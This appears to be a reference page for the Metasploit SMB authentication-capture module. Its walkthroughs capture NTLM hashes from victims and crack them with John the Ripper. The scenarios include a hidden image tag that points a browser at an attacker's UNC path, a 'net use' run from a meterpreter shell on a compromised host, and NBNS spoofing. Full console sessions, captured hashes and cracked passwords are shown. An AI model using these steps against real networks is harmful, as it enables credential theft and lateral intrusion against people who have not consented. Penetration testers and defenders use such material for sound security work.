Authentication Capture: SMB - Metasploit


This page contains detailed information about how to use the auxiliary/server/capture/smb metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Authentication Capture: SMB
Module: auxiliary/server/capture/smb
Source code: modules/auxiliary/server/capture/smb.rb
Disclosure date: -
Last modification time: 2021-08-27 17:23:41 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module. One way to force an SMB authentication attempt is by embedding a UNC path (\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to respond to queries for names the victim is already looking for.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > show targets
    ... a list of targets ...
msf auxiliary(smb) > set TARGET target-id
msf auxiliary(smb) > show options
    ... show and set options ...
msf auxiliary(smb) > exploit

Knowledge Base

This module creates a mock SMBv1 server which accepts credentials before returning NT_STATUS_LOGON_FAILURE.

SMBv1 is enabled by default on systems before, and including:

  • Windows XP
  • Windows Server 2008 R2

Microsoft provides an article on how to detect, disable, and enable SMB in various versions here

Verification Steps

  1. Start msfconsole
  2. Do: use auxiliary/server/capture/smb
  3. Do: run

Options

CAINPWFILE

A file to store Cain & Abel formatted captured hashes in

CHALLENGE

An 8 byte server challenge. Default is 1122334455667788

JOHNPWFILE

A file to store John the Ripper formatted hashes in

Scenarios

Linux Connection via smbclient

Ubuntu 18.04 with smbclient 4.7.6-Ubuntu installed.

Based on shellvoide.com

You'll need to set client use spnego = no under [global] in smb.conf to ensure SMBv1 compatibility.

Server:

msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
[*] SMB Captured - 2019-09-25 22:44:04 -0400
NTLMv2 Response Captured from 2.2.2.2:50978 - 2.2.2.2
USER:ubuntu DOMAIN:WORKGROUP OS:Unix LM:Samba
LMHASH:Disabled 
LM_CLIENT_CHALLENGE:Disabled
NTHASH:a6b70b49c8d42903fbe6231ce53a21ff 
NT_CLIENT_CHALLENGE:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
[*] SMB Capture - Empty hash captured from 2.2.2.2:50978 - 2.2.2.2 captured, ignoring ...

Client:

root@Kali:~# grep spnego /etc/samba/smb.conf 
client use spnego = no
root@Kali:~# smbclient //1.1.1.1/fake
Enter WORKGROUP\root's password: 
session setup failed: NT_STATUS_LOGON_FAILURE

Crack the Hash:

# cat /tmp/john_netntlmv2
ubuntu::WORKGROUP:1122334455667788:a6b70b49c8d42903fbe6231ce53a21ff:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
# john /tmp/john_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
test             (ubuntu)
1g 0:00:00:00 DONE (2019-09-25 22:46) 11.11g/s 1865Kp/s 1865Kc/s 1865KC/s 24782478..playpen
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Windows XP via net use

Method also confirmed on Windows 2008r2

Based off of hackers-arise.com

The idea here is we have a shell on a Windows box where we can't hashdump due to user permissions. However, we're able to do a net use to make an SMB connection back to our server to get the user's hash, then hopefully crack it.

meterpreter > getuid
Server username: WINXP\test
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/smb) > 
[*] Started service listener on 0.0.0.0:445 
[*] Server started.

msf5 auxiliary(server/capture/smb) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\test\Desktop>net use \\1.1.1.1 fake

[*] SMB Captured - 2019-09-25 22:26:04 -0400
NTLMv1 Response Captured from 2.2.2.2:1056 - 2.2.2.2
USER:test DOMAIN:WINXP OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25
NTHASH:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c
net use \\1.1.1.1 fake
System error 1326 has occurred.

Logon failure: unknown user name or bad password.


C:\Documents and Settings\test\Desktop>

We're now able to use John the Ripper to crack the password.

# cat /tmp/john_netntlm 
test::WINXP:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c:1122334455667788
# john /tmp/john_netntlm --format=netlm  --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 1 password hash (netlm, LM C/R [DES 32/64])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
FAKE             (test)
1g 0:00:00:00 DONE (2019-09-25 22:28) 1.333g/s 1398Kp/s 1398Kc/s 1398KC/s 123456..LATISHA1
Use the "--show --format=netlm" options to display all of the cracked passwords reliably
Session completed

UNC in Websites Vector

One way to coax a user into creating an SMB connection is to embed it in a website

First, create the website (we're using Kali for this) with the following content: <html> <head> <title>UNC Example</title> </head> <body> <img src="file:////1.1.1.1/fake.jpg" width="0px" height="0px"> </body> </html>

This file, for the example is in /var/www/html/unc.html.

Also of note, this could be done via XSS or other injection technique.

Start the webserver: service apache2 start

Server: msf5 > use auxiliary/server/capture/smb msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john johnpwfile => /tmp/john msf5 auxiliary(server/capture/smb) > run [*] Auxiliary module running as background job 0. msf5 auxiliary(server/capture/smb) > [*] Started service listener on 0.0.0.0:445 [*] Server started. [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:957c33ac7e9d7bf4459ddb2c65109aaa NT_CLIENT_CHALLENGE:01010000000000007a7e22719474d5014eb86a13abf5f61000000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:e4411aead169063032e832539864b4ff NT_CLIENT_CHALLENGE:0101000000000000fd0e3f719474d501ed3acc4801283dee00000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:f09d780a73410902dae21653cc9ef117 NT_CLIENT_CHALLENGE:0101000000000000bed143719474d5015e71b1d1c6aba91800000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:b9f84605b6cd0feb57c38f5d7251d5e0 NT_CLIENT_CHALLENGE:01010000000000007f9448719474d50164270f62c422d35200000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:a1f2d3c84c444368bea5cac47707faec NT_CLIENT_CHALLENGE:01010000000000003f574d719474d50197b541b568bd9d3600000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:b895915d8c813c99512904bd1b84f2e2 NT_CLIENT_CHALLENGE:0101000000000000001a52719474d501b8fa9400bb1ff22f00000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:309c3abcd382e8541a811a8d9af66002 NT_CLIENT_CHALLENGE:0101000000000000c0dc56719474d501cea04f59f7a5dc5a00000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:1378542b978996b23f6f88c8d52b3d22 NT_CLIENT_CHALLENGE:0101000000000000819f5b719474d501cd5954986a11cd6600000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:425740c14d740ba89aae0533e1c320bb NT_CLIENT_CHALLENGE:0101000000000000416260719474d501dc6bac2b5637209b00000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:b291ca93971c18c3fa3f9789c25296c8 NT_CLIENT_CHALLENGE:0101000000000000022565719474d501d583f2f3dbf2ea0000000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:3a908e59fe9f96a7f871b3aa2155dce1 NT_CLIENT_CHALLENGE:0101000000000000c2e769719474d5015e8a4d8a139e8eea00000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:2a76fc76174c297712b08e301ac1b08e NT_CLIENT_CHALLENGE:010100000000000083aa6e719474d5019684d5d78475e27500000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:5d7057563a44671ec26ec021613f45b4 NT_CLIENT_CHALLENGE:0101000000000000a4ce75719474d50184900d6f208cb07500000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:ec6ce9d5171e9f5ee017d963797e760c NT_CLIENT_CHALLENGE:010100000000000064917a719474d501006e93848f1fb88100000000020000000000000000000000 [*] SMB Captured - 2019-09-26 14:01:37 -0400 NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:d96937debde3ce251f6889fc1be21a2f NT_CLIENT_CHALLENGE:010100000000000025547f719474d5014dd729fda10cf20c00000000020000000000000000000000

Client: Browse to the webpage. This example is on Windows Server 2008r2 with Internet Explorer.

Crack the password:

john /tmp/john_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8 Loaded 17 password hashes with 17 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Remaining 15 password hashes with 15 different salts Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) 15g 0:00:00:00 DONE (2019-09-26 14:06) 115.3g/s 283569p/s 4253Kc/s 4253KC/s dyesebel..holaz Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed

Spoofing NBNS

If the target(s) are on the local network, it's possible to conduct an nbns spoof to attract additional SMB queries to your host. This scenario will utilize auxiliary/spoof/nbns/nbns_response to conduct the spoofing. If a Windows user attempts to browse or mount a network name such as \\fake, the nbns module will respond back with the set IP.

This is based on hackingarticles.in

Server side:
msf5 > use auxiliary/server/capture/smb msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/johnnbns johnpwfile => /tmp/johnnbns msf5 auxiliary(server/capture/smb) > run [] Auxiliary module running as background job 0. msf5 auxiliary(server/capture/smb) > [] Started service listener on 0.0.0.0:445 [*] Server started.

msf5 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response msf5 auxiliary(spoof/nbns/nbns_response) > set spoofip 1.1.1.1 spoofip => 1.1.1.1 msf5 auxiliary(spoof/nbns/nbns_response) > set interface eth0 interface => eth0 msf5 auxiliary(spoof/nbns/nbns_response) > exploit [] Auxiliary module running as background job 1. msf5 auxiliary(spoof/nbns/nbns_response) > [] NBNS Spoofer started. Listening for NBNS requests with REGEX "." ... [+] 2.2.2.2 nbns - FAKE matches regex, responding with 1.1.1.1 [+] 2.2.2.2 nbns - FAKE matches regex, responding with 1.1.1.1 [] SMB Captured - 2019-09-26 16:19:09 -0400 NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:5a44b22db99861330e1637f0565f595f NT_CLIENT_CHALLENGE:010100000000000022529fa7a774d501b3b3f093392560d600000000020000000000000000000000 [] SMB Captured - 2019-09-26 16:19:09 -0400 NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:00837cb572f0116c7544ca0f56d31f5c NT_CLIENT_CHALLENGE:0101000000000000c606c3a7a774d501c28ee74be786099100000000020000000000000000000000 [] SMB Captured - 2019-09-26 16:19:09 -0400 NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:b571090dea4270b6b6d2b3de39321b29 NT_CLIENT_CHALLENGE:010100000000000087c9c7a7a774d501c00e467bda8a8b4a00000000020000000000000000000000 [*] SMB Captured - 2019-09-26 16:19:09 -0400 NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2 USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:dc28e9e94c6199e814937d61e3956c7d NT_CLIENT_CHALLENGE:0101000000000000084fd1a7a774d5014f34895403460b1b00000000020000000000000000000000

Victim: Open Explorer and type \\fake

Finally, Crack the password:

john /tmp/johnnbns_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8 Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) Password123 (Administrator) 6g 0:00:00:00 DONE (2019-09-26 16:25) 100.0g/s 614400p/s 3686Kc/s 3686KC/s dyesebel..holaz Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed

Word Document UNC Injector

Another strategy is to create content which can entice a user to open, containing a UNC link, and thus creating an SMB connection. To accomplish this, we use auxiliary/docx/word_unc_injector.

Go back to menu.

Msfconsole Usage

Here is how the server/capture/smb auxiliary module looks in the msfconsole:

msf6 > use auxiliary/server/capture/smb

msf6 auxiliary(server/capture/smb) > show info

       Name: Authentication Capture: SMB
     Module: auxiliary/server/capture/smb
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  hdm <[email protected]>

Available actions:
  Name     Description
  ----     -----------
  Capture  Run SMB capture server

Check supported:
  No

Basic options:
  Name        Current Setting   Required  Description
  ----        ---------------   --------  -----------
  CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
  CHALLENGE   1122334455667788  yes       The 8 byte server challenge
  JOHNPWFILE                    no        The prefix to the local filename to store the hashes in John format
  SRVHOST     0.0.0.0           yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT     445               yes       The local port to listen on.

Description:
  This module provides a SMB service that can be used to capture the 
  challenge-response password hashes of SMB client systems. Responses 
  sent by this service have by default the configurable challenge 
  string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy 
  cracking using Cain & Abel, L0phtcrack or John the ripper (with 
  jumbo patch). To exploit this, the target system must try to 
  authenticate to this module. One way to force an SMB authentication 
  attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page 
  or email message. When the victim views the web page or email, their 
  system will automatically connect to the server specified in the UNC 
  share (the IP address of the system running this module) and attempt 
  to authenticate. Another option is using 
  auxiliary/spoof/{nbns,llmnr} to respond to queries for names the 
  victim is already looking for.

Module Options

This is a complete list of options available in the server/capture/smb auxiliary module:

msf6 auxiliary(server/capture/smb) > show options

Module options (auxiliary/server/capture/smb):

   Name        Current Setting   Required  Description
   ----        ---------------   --------  -----------
   CAINPWFILE                    no        The local filename to store the hashes in Cain&Abel format
   CHALLENGE   1122334455667788  yes       The 8 byte server challenge
   JOHNPWFILE                    no        The prefix to the local filename to store the hashes in John format
   SRVHOST     0.0.0.0           yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT     445               yes       The local port to listen on.

Auxiliary action:

   Name     Description
   ----     -----------
   Capture  Run SMB capture server

Advanced Options

Here is a complete list of advanced options supported by the server/capture/smb auxiliary module:

msf6 auxiliary(server/capture/smb) > show advanced

Module advanced options (auxiliary/server/capture/smb):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   DOMAIN_NAME             anonymous        yes       The domain name used during smb exchange with SMB_EXTENDED_SECURITY set.
   ListenerComm                             no        The specific communication channel to use for this service
   NTLM_UseNTLM2_session   false            yes       Activate the 'negotiate NTLM2 key' flag in NTLM authentication. When SMB_EXTENDED_SECURITY negotiate is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)
   SMBServerIdleTimeout    120              yes       The maximum amount of time to keep an idle session open in seconds
   SMBServerMaximumBuffer  2                yes       The maximum number of data in megabytes to buffer
   SMB_EXTENDED_SECURITY   false            yes       Use smb extended security negotiation, when set client will use ntlmssp, if not then client will use classic lanman authentification
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   USE_GSS_NEGOTIATION     true             yes       Send a gss_security blob in smb_negotiate response when SMB extended security is set. When this flag is not set, Windows will respond without gss encapsulation, Ubuntu will still use gss.
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the server/capture/smb module can do:

msf6 auxiliary(server/capture/smb) > show actions

Auxiliary actions:

   Name     Description
   ----     -----------
   Capture  Run SMB capture server

Evasion Options

Here is the full list of possible evasion options supported by the server/capture/smb auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(server/capture/smb) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Failed closing SMB server socket

Here is a relevant code snippet related to the "Failed closing SMB server socket" error message:

249:	
250:	  def cleanup
251:	    begin
252:	      @rsock.close if @rsock
253:	    rescue => e
254:	      elog('Failed closing SMB server socket', error: e)
255:	    end
256:	
257:	    super
258:	  end
259:

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:

Authors

hdm

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.